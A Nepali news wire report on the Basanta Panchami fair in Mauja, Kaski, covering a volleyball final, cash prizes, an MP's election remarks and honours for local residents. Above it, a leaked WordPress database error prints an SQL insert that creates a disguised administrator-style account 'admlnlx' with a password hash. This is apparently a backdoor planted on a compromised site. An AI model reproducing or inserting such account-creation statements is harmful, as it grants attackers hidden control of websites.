WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmC0EuDdyxhLWm/HQGcPzIuOoTa4h/1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 23:06:13', '', 'admlnlx', 'admlnlx')
पोखरा,माघ २२ –
कास्की जिल्लाको उत्तरी भेगस्थित मौजा गाविसमा प्रयत्नशील युवा क्लबद्वारा प्रत्येक वर्ष आयोजना गरिँदै आएको वसन्तपञ्चमी मेलाले विगत चार दशकदेखि निरन्तरता पाउँदै आएको छ ।
प्राचीत संस्कृतिअनुसार स्थानीय ‘यागो सिद्ध बराह’ मन्दिरमा पाठोको बली दिएर मात्र सुरु हुने सो त्रि–दिवसीय मेला श्रीपञ्चमीका दिन सुरु भएर शुक्रबार सम्पन्न भएको छ ।
पोखरा बजारबाट नजिकै भएर पनि ओझेलमा परेको सो गाउँका प्राकृतिक एवम् धार्मिक महत्व बोकेका स्थानको पहिचानसँगै प्रचारप्रसार गर्ने मेलाको उद्देश्य रहेको प्रयत्नशील युवा क्लबका अध्यक्ष मणिराज गुरुङले जानकारी दिनुभयो ।
मेलाको मुख्य आकर्षणको रुपमा रहेको खुल्ला पुरुष भलिबल प्रतियोगिताको फाइनल खेलमा शिवशक्ति युवा क्लब मौजाले प्रयत्नशील युवा क्लब मोहरीलाई एकका विरुद्ध ३ सेटले पराजित गर्दै रु ३५ हजार नगद प्राप्त ग¥यो । उपविजेता टिमले रु २५ हजार नगद प्राप्त गरे । छेलो प्रतियोगितामा निरज गुरुङ प्रथम भएका थिए ।
सांसद यज्ञबहादुर थापाले प्रतियोगिताका विजयी खेलाडी तथा टिमलाई नगद पुरस्कारसहित ट्रफी, पदक र प्रमाणपत्र वितरण गर्दै मुलुकको समग्र विकास र संविधान कार्यान्वयनका लागि एक वर्षभित्र तीनै तहको निर्वाचनको गर्नुको विकल्प नरहेको बताउनुभयो ।
विभिन्न कालखण्डबाट प्राप्त उपलब्धिको रक्षासँगै मुलुकको समृद्धिका लागि प्रमुख राजनीतिक शक्ति एक ठाउँमा उभिनुपर्ने उहाँको भनाइ थियो ।
सो कार्यक्रममा भौजा विकास कोषद्वारा सञ्चालित शिक्षातर्पm प्रगति नेपाली र पूर्णबहादुर गुरुङ, मौजालाई बाख्रापालनको पकेट क्षेत्रका रुपमा परिचित गराउन योगदान पु¥याउनुहुने सीता गुरुङ, हीराजङ्ग गुरुङ र दुर्गबहादुर गुरुङ तथा आदर्श बाजेबज्यैमा छनोट हुनुभएका बलराम गुरुङ र श्रीमती कृष्ण गुरुङलाई सम्मान गरिएको थियो । – रासस